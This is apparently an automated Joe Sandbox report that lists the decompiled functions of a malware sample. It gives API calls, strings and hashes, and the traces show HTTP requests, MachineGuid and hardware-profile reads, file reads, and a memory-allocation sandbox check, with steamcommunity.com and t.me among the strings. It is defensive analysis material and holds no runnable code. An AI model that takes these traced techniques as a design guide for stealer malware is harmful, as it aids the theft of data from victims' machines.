                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpylstrlenstrstr$Sleep
                                                                                                                                                                                                                                                                                • String ID: ERROR$steamcommunity.com$t.me
                                                                                                                                                                                                                                                                                • API String ID: 1105026832-5696879
                                                                                                                                                                                                                                                                                • Opcode ID: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                                • Instruction ID: d2cef3e00896b903973622f9bff644efbf55bb675c2f2304de14bb25205f25c7
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CA1C131900619ABCF05EFA1C9958EEB775BF58308F00814AF8056B152EF7CAAD5CBD5
                                                                                                                                                                                                                                                                                Function 004169C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: StrCmpCA.SHLWAPI(?,https), ref: 004042F4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00404360
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: InternetSetOptionA.WININET(00000000,0000001F,FFFFFFFF,00000004), ref: 00404387
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404280: HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004043B3
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,0042150A), ref: 00416A2B
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00416A46
                                                                                                                                                                                                                                                                                  • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,00000000,00000000,00000000), ref: 00416A6E
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00416A8F
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000001,?), ref: 00416AA6
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                                                • String ID: ERROR
                                                                                                                                                                                                                                                                                • API String ID: 4174444224-2861137601
                                                                                                                                                                                                                                                                                • Opcode ID: 3da0e4c79ea6eeeea05f36d05e7dcc9dc094194869fc174e7ba2f01bb6edc5a2
                                                                                                                                                                                                                                                                                • Instruction ID: 855039ff49ac9ec10de8df2a88766b452ea63e393e544b77beb2aca96e60e2a3
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3da0e4c79ea6eeeea05f36d05e7dcc9dc094194869fc174e7ba2f01bb6edc5a2
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E418131600219ABCB15EBA2D9529EE7369AF44344F41441EF90267241DF7CBD86CBE9
                                                                                                                                                                                                                                                                                Function 00411120 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004111D8
                                                                                                                                                                                                                                                                                • CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CharCloseOpenQueryValue
                                                                                                                                                                                                                                                                                • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                • API String ID: 47404925-1211650757
                                                                                                                                                                                                                                                                                • Opcode ID: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                                • Instruction ID: 74cc808a3cf8f870bdb796636e5c792b2cd0ecd8dddfbe9d76d68e0a257a884b
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8214521D1C7C296E360CB10CD557FBB7A4ABF6348F11A71EB5CC51072EAB061D48342
                                                                                                                                                                                                                                                                                Function 00402520 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040257A
                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040258E
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 004025AD
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 004025E7
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00000000,string too long,004024F6,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 00402608
                                                                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0040260D
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ??2@$??3@Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemcpy
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3928403917-0
                                                                                                                                                                                                                                                                                • Opcode ID: 8153bee1c1f18c4321dbbef74a0984615106f9ad5e3a5235685405019ec4d011
                                                                                                                                                                                                                                                                                • Instruction ID: 52b5ec612f7533a417f76914090347e108d7196820fc58126e476e1f6b56743e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8153bee1c1f18c4321dbbef74a0984615106f9ad5e3a5235685405019ec4d011
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 152107B26006011BCB24AE7D9E9842FB7E9DF953107150B3FF452D77C1E6B9D884829D
                                                                                                                                                                                                                                                                                Function 004076B0 Relevance: 9.1, APIs: 6, Instructions: 74filememoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                                • Opcode ID: 6e03da7bb686982697c9352cba9d24d53c2a6859cb69aed1fdb7ab7d2ece8e95
                                                                                                                                                                                                                                                                                • Instruction ID: 57bb2ce498e656ac9101d6a6683512ef7afea4cd211be1053fa5c26a8075d75e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e03da7bb686982697c9352cba9d24d53c2a6859cb69aed1fdb7ab7d2ece8e95
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF21DE75204B009FC320EF64C984A6AB7F5FF89354F00482DF996CB2A0D735B945CBA2
                                                                                                                                                                                                                                                                                Function 00401000 Relevance: 9.1, APIs: 6, Instructions: 51memoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,004185DE), ref: 00401005
                                                                                                                                                                                                                                                                                • VirtualAllocExNuma.KERNEL32 ref: 00401025
                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32 ref: 0040103D
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00401063
                                                                                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 0040107D
                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00401089
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Virtual$AllocProcess$CurrentExitFreeNumamemset
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1822673426-0
                                                                                                                                                                                                                                                                                • Opcode ID: 15f42dff5f2301d38eca779a0d211f41eaceec2696e379f308e95cd99238eb0b
                                                                                                                                                                                                                                                                                • Instruction ID: 70da7db2db91f88941c3e71440bfa6ebbd6eb466aaac7195974b89fd4c7015d6
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15f42dff5f2301d38eca779a0d211f41eaceec2696e379f308e95cd99238eb0b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA01D431A0665457E3102B386C09BEFB794AF16705F505538F888A2271EB20898586E9
                                                                                                                                                                                                                                                                                Function 00410700 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411E60: malloc.MSVCRT ref: 00411E71
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411E60: strncpy.MSVCRT ref: 00411E82
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,00000000,00000000,0000000E,?,?,?), ref: 0041076A
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,0041FE21,?,00000000,00000000,0000000E,?,?,?), ref: 00410780
                                                                                                                                                                                                                                                                                • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
